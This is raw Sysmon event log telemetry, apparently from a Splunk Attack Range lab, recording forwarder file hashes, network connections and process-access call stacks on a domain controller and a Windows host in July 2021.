07:43:35.137{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AEDC217BF56AB42A15BA68910C0E0B5,SHA256=C737BDD26B3510035811922F0F395ADBD23CC89FD40811A2B47021090E459403,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806009Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:36.874{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95D66BC6D51B327169087CA0BD1CDB46,SHA256=B5973523151579EFCB612921D6D75117E63AEFFF2ECEC5C4D6561DDED861947D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045780Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:29.313{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57148-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001045779Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:36.153{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5949E194787D7593BEB25296FD0854D,SHA256=E81394AB1AD81666705F4AF46ED825BF6C662FF452FDD6255CD85BFF1604666A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806008Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:35.624{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.218-25037-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x8000000000000000806007Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:34.398{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57147-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806006Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:36.765{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7DC534C9AA5222E16143A8DB6E712EF5,SHA256=E77F7BF9A4A9657441FAC2D5AADF43AC793238432AF7D551AD803B47B1446374,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806005Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:36.765{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=027AD932C80E6D5AD96B537FC0F3544E,SHA256=D80CCAC1B13D8F91027D8C075E06DB8619394BF1108F219E45D833F6011287FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806011Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:37.875{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EC71181C180CB9C0215A2ED43BB9B6B,SHA256=0C482228139B4D03EC0542F334680738A56030FBA013A56EEC15BF072CC377FF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806010Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:35.908{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57148-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x80000000000000001045781Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:37.168{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=345A2988F2C573D4B952A21B4CD7127E,SHA256=55695CA27721B796FD12D43A0C29272DC8C4F9D56B91077D78BEA4FE7C156C07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806012Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:38.888{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71C87426BB0E86B3FF16148676234A57,SHA256=8BCD4AD80BF95528E298338C5004A100D7D15555A70B1EAF18AB928F90BB37EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045784Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:38.436{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=869F72B7831B27B8C703E55BB38D8D1F,SHA256=5CB0AAE7AB5539AF6E3B88D7723C0588B64A7F53984B14ACA45486BACA49571E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045783Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:38.236{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93BDC5A8C1F0CDB526ADD68E30C062B1,SHA256=6C6D6D54039DDEBDE6E373C998E0F134FDB48C3C67F3007248A94096F46E2027,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045782Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:29.710{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50894-false10.0.1.12-8000- 23542300x8000000000000000806013Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:39.903{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85C5B03DE50A49C066E115F2D180A30F,SHA256=E4FA9DEC11DB49E3D3AEC60C9E02B44900A2B78520878D01053BFC4C8516B49B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045785Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:39.250{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F45EC4EB0B959C959E3CBCB83CB55139,SHA256=BA93C2B31A7BD70B9F91987EFD4F3274CC4175F5EA4B87D6F8354330991A0917,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806014Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:40.934{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC16AF42397E68B384BD3BD492E644F8,SHA256=1E3C0D4AAD4C832B13F83A4BDC4AB4F74159B80976CABA56677652EA81EEC2EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045786Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:40.265{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C582DAB143D6DF88C36C2FE3DB45CF8,SHA256=A65E5CA5B7A8C06497E5F41F3AA77D849A010AD874B7880B2F6992F16013C097,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806015Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:41.934{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5026DC0A9377B6A74252C10515A45E52,SHA256=64628620CCAFD48EA6668AD1120263AE086B9A8D92FD1374A7605A20344345B0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045790Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:41.418{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045789Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:41.418{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045788Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:41.418{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001045787Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:41.283{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=316FF4602A79E0B4846210C0B36C7A2A,SHA256=BE648042DB98765170AD8F67AA16FC282F3CD21832EDB5BD9881EAE6F7B67356,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806017Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:42.950{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE0C692891293D8A74DB90F6D58DB5B0,SHA256=D302EBEB84FC7A024656D3824A759ABCF771B799581A2245C6D5F85A301E0FFF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045819Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.588{466BC892-02AD-60E8-0A00-00000000CF01}6163760C:\Windows\system32\services.exe{466BC892-F2AE-60EB-E57C-00000000CF01}3908C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045818Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.567{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F2AE-60EB-E57C-00000000CF01}3908C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045817Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.567{466BC892-02AD-60E8-0A00-00000000CF01}6162696C:\Windows\system32\services.exe{466BC892-F2AE-60EB-E57C-00000000CF01}3908C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+17f9d|C:\Windows\SYSTEM32\ntdll.dll+65b55|C:\Windows\SYSTEM32\ntdll.dll+6585d|C:\Windows\SYSTEM32\ntdll.dll+656c0|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045816Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.552{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-02AD-60E8-0A00-00000000CF01}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045815Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.552{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045814Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.552{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045813Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.552{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-02AD-60E8-0A00-00000000CF01}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001045812Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.552{466BC892-F2AE-60EB-E47C-00000000CF01}6836C:\Windows\System32\taskhostw.exeC:\Users\bob\AppData\Local\Temp\RDR7774.tmp\empty.txt2021-07-12 07:43:42.552 10341000x80000000000000001045811Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.505{466BC892-F2AE-60EB-E47C-00000000CF01}68369920C:\Windows\System32\taskhostw.exe{466BC892-5881-60E8-7F10-00000000CF01}7164C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\radarrs.dll+b7b9|C:\Windows\system32\radarrs.dll+7579|C:\Windows\system32\radarrs.dll+5d54|C:\Windows\System32\wdi.dll+1eea|C:\Windows\System32\wdi.dll+6e21|C:\Windows\System32\wdi.dll+14e6|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045810Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.505{466BC892-F2AE-60EB-E47C-00000000CF01}68369920C:\Windows\System32\taskhostw.exe{466BC892-5881-60E8-7F10-00000000CF01}7164C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\radarrs.dll+b4b9|C:\Windows\system32\radarrs.dll+7514|C:\Windows\system32\radarrs.dll+5d54|C:\Windows\System32\wdi.dll+1eea|C:\Windows\System32\wdi.dll+6e21|C:\Windows\System32\wdi.dll+14e6|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045809Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.468{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045808Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.468{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045807Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.468{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045806Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 